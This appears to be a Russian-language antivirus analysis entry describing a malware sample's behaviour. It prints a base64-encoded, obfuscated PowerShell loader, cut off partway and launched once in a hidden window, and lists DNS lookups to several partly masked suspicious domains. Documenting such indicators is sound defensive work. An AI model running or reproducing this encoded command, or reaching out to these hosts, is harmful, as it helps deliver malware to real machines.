Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBpAE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC...
- DNS ASK ac######ess.rdsarkar.com
- DNS ASK bl##.atxin.cc
- DNS ASK ac#.##siva.com.ec
- DNS ASK bo######ers.kounterdev.com
- DNS ASK bl###arze.y0.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBpAE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC...' (со скрытым окном)